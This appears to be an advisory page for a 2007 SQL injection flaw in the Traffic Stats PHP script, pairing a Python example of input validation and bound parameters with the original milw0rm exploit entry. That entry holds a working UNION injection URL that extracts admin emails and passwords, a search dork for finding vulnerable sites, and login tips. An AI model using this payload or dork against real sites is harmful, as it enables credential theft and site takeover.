Author: t0pP8uZz & xprog
CVSS: 5.5 (MEDIUM)
CWE: 89 (SQL Injection)
Patch Exists: NO
Published: 2007

Traffic Stats SQL Injection Vulnerability

The 'offset' parameter of the 'referralUrl.php' script is placed into a SQL query without validation. By supplying a UNION-based SQL injection payload through that parameter, an attacker can read the admin's email and password from the 'StatAdmin' table.

Mitigation:

To mitigate this vulnerability, the application should implement proper input validation and sanitization techniques to prevent SQL injection attacks. Additionally, using parameterized queries or prepared statements can help protect against SQL injection.
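The following is an added example of the mitigation described above, written in Python with sqlite3 rather than in the PHP of the original script; it is not code from the Traffic Stats application. The 'StatAdmin' table and its 'email' and 'password' columns are the names given in the advisory; the 'referrals' table, its columns, the page size and the sample rows are constructed for the demonstration. The fix pattern has two layers: the 'offset' value is accepted only if it is a plain non-negative integer literal, and the query then passes it as a bound parameter instead of concatenating it into the SQL text.

```python
import re
import sqlite3

PAGE_SIZE = 2  # constructed: rows per page of referral stats


def build_sample_db() -> sqlite3.Connection:
    """Create an in-memory database with constructed sample data.

    'referrals' is a hypothetical stats table; 'StatAdmin' uses the table and
    column names from the advisory. The password value is a placeholder.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE referrals (id INTEGER PRIMARY KEY, url TEXT, hits INTEGER);
        INSERT INTO referrals (url, hits) VALUES
            ('http://example.org/a', 12),
            ('http://example.org/b', 7),
            ('http://example.org/c', 3);
        CREATE TABLE StatAdmin (email TEXT, password TEXT);
        INSERT INTO StatAdmin VALUES ('admin@example.org', 'PLACEHOLDER_HASH');
        """
    )
    return conn


def parse_offset(raw: str) -> int:
    """Accept only an ASCII non-negative integer literal for 'offset'.

    A minus sign, comment markers such as '/**/', keywords or a trailing '/*'
    all fail this check, so the advisory's payload never reaches the database.
    """
    if re.fullmatch(r"[0-9]{1,9}", raw) is None:
        raise ValueError(f"invalid offset parameter: {raw!r}")
    return int(raw)


def fetch_referrals(conn: sqlite3.Connection, raw_offset: str) -> list:
    """Hardened query: typed input plus bound parameters, no string building."""
    offset = parse_offset(raw_offset)
    cur = conn.execute(
        "SELECT url, hits FROM referrals ORDER BY id LIMIT ? OFFSET ?",
        (PAGE_SIZE, offset),
    )
    return cur.fetchall()


def try_fetch(conn: sqlite3.Connection, raw_offset: str):
    """Return the page of rows for a valid offset, or None if it was rejected.

    A web handler would turn the None case into an HTTP 400 and log the
    rejected value for detection purposes.
    """
    try:
        return fetch_referrals(conn, raw_offset)
    except ValueError:
        return None


if __name__ == "__main__":
    db = build_sample_db()
    print(try_fetch(db, "1"))
    # The UNION payload quoted in the advisory is rejected at the validation step.
    print(try_fetch(db, "-1/**/UNION/**/ALL/**/SELECT/**/1,2,"
                        "concat(email,0x3a,password)/**/FROM/**/StatAdmin/*"))
```

Even on its own, binding the value with a placeholder would stop the injection, because the driver sends it as data rather than as SQL text; the integer check in front of it additionally gives the application a clean place to reject and log malformed requests.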

Exploit-DB raw data:

--==+================================================================================+==--
--==+                  Traffic Stats SQL Injection Vulnerability                +==--
--==+================================================================================+==--

AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: allintext:" If you would like to contact us, our email address is" traffic


DESCRIPTION:
pull out admin email/passwords


EXPLOITS:
http://server.com/Script_Dir/referralUrl.php?offset=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(email,0x3a,password)/**/FROM/**/StatAdmin/*


NOTE/TIP:
first you must register an account, then click "ad site" and add random sites, then paste the injection
admin login is at /admin/; only the password is needed :D


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org !


--==+================================================================================+==--
--==+                  Traffic Stats SQL Injection Vulnerability                +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-16]